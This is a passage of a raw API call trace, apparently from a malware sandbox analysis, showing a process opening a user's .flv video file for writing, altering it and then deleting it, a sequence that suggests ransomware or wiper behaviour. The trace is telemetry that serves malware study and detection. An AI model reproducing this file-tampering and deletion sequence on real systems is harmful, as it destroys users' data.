ftCreationTime.dwLowDateTime=0xe85ed130, ftCreationTime.dwHighDateTime=0x1d5c5dd, ftLastAccessTime.dwLowDateTime=0xfab68a0, ftLastAccessTime.dwHighDateTime=0x1d5c086, ftLastWriteTime.dwLowDateTime=0xfab68a0, ftLastWriteTime.dwHighDateTime=0x1d5c086, nFileSizeHigh=0x0, nFileSizeLow=0x118e5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Q6LtnsYYX SfRjU.flv", cAlternateFileName="Q6LTNS~1.FLV")) returned 0x7c2240 [0043.868] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.868] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0043.868] CharLowerBuffW (in: lpsz="byte[71909]", cchLength=0xb | out: lpsz="byte[71909]") returned 0xb [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.869] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.869] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.869] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.870] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da2e8 [0043.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da2e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.870] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.870] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0043.870] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.870] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.871] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.872] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.873] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.873] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0043.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x8895c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0043.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\q6ltnsyyx sfrju.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.873] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.874] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.874] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.874] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.874] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.874] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.874] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.874] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.874] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.874] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.875] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.875] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.875] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.875] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.875] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.875] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.875] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.875] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.875] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", lpFilePart=0x0) returned 0x47 [0043.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85ed130, ftCreationTime.dwHighDateTime=0x1d5c5dd, ftLastAccessTime.dwLowDateTime=0xfab68a0, ftLastAccessTime.dwHighDateTime=0x1d5c086, ftLastWriteTime.dwLowDateTime=0x19dd0060, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x118e5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Q6LtnsYYX SfRjU.flv", cAlternateFileName="Q6LTNS~1.FLV")) returned 0x7c2240 [0043.875] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Q6LtnsYYX SfRjU.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\q6ltnsyyx sfrju.flv")) returned 1 [0043.877] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85ed130, ftCreationTime.dwHighDateTime=0x1d5c5dd, ftLastAccessTime.dwLowDateTime=0xfab68a0, ftLastAccessTime.dwHighDateTime=0x1d5c086, ftLastWriteTime.dwLowDateTime=0x19dd0060, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x118e5, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Q6LtnsYYX SfRjU.flv", cAlternateFileName="Q6LTNS~1.FLV")) returned 0 [0043.877] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0043.877] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.878] HeapFree (in: 